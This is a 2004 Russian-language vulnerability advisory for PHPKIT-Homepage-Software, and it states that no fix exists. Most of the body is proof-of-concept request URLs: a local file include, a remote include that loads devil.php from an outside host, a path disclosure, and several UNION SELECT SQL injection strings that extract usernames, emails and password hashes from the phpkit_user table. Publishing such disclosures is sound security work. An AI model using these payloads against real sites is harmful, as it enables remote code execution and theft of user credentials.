Security Lab

Множественные уязвимости в PHPKIT

Дата публикации:05.06.2004
Всего просмотров:1882
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: PHPKIT-Homepage-Software

Описание: Несколько уязвимостей обнаружено в PHPKIT-Homepage-Software. Удаленный атакующий может выполнить произвольный PHP код, выполнить нападение SQL инъекции и раскрыть инсталляционный путь.

Возможен локальный инклуд *.php :

 http://hanter/include.php?path=/home/devil.php
Возможнен инклуд в системе администратирования:
 http://hanter/admin/admin.php?path=http://host/devil.php
Раскрытие инсталляционного пути:
 
http://hanter/include.php?path=update_1602.php
Возможность SQL инъекции: + Получение md5 хеша пароля пользователей и администратора(ов):
http://hanter/include.php?path=comment/comment.php&comcat=gb&subid=1'+UNION+SELECT+null,null,user_email,
user_name,null,null,null,null,user_pw,null,null,null+FROM+phpkit_user+WHERE+user_id='1

http://hanter/include.php?path=login/member.php&order=nick&usernick='+UNION+SELECT+null,null,null,null,null,
null,user_pw,null,null,user_name,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM
+phpkit_user+WHERE+user_name+LIKE+'%

http://hanter/include.php?path=comment/comment.php&subid=1&comcat=gb'+UNION+SELECT+null,null,null,null,
user_name,null,user_pw,null+FROM+phpkit_user+WHERE+user_id='1
 
 +

http://hanter/include.php?path=login/userinfo.php&id='sql-inj
http://hanter/include.php?path=content/overview.php&type=1&letter='sql-inj
http://hanter/include.php?path=forum/showcat.php&catid='sql-inj
http://hanter/include.php?path=login/imcenter.php&userid='sql-inj
http://hanter/include.php?newposttime='sql-inj&path=forum/main.php
http://hanter/include.php?path=forum/showthread.php&threadid=3'sql-inj
http://hanter/include.php?path=login/mailer.php&userid=1'sql-inj
http://hanter/include.php?path=content/download.php&contentid=14'sql-inj

URL производителя:http://www.phpkit.de/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Уязвимость обнаружил Hanter [hanter-xxx-net ять mail.ru].